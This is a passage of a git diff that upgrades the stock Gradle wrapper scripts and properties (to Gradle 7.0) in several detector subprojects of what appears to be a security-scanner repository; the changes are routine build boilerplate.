a/google/detectors/directorytraversal/cve20213223/gradlew +++ b/google/detectors/directorytraversal/cve20213223/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/directorytraversal/cve20213223/gradlew.bat b/google/detectors/directorytraversal/cve20213223/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/directorytraversal/cve20213223/gradlew.bat +++ b/google/detectors/directorytraversal/cve20213223/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/apache_nifi_api/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/apache_nifi_api/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/apache_nifi_api/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/apache_nifi_api/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/apache_nifi_api/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/apache_nifi_api/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/apache_nifi_api/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/apache_nifi_api/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/apache_nifi_api/gradlew b/google/detectors/exposedui/apache_nifi_api/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/apache_nifi_api/gradlew +++ b/google/detectors/exposedui/apache_nifi_api/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/apache_nifi_api/gradlew.bat b/google/detectors/exposedui/apache_nifi_api/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/exposedui/apache_nifi_api/gradlew.bat +++ b/google/detectors/exposedui/apache_nifi_api/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/argoworkflow/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/argoworkflow/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/argoworkflow/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/argoworkflow/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/argoworkflow/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/argoworkflow/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/argoworkflow/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/argoworkflow/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists 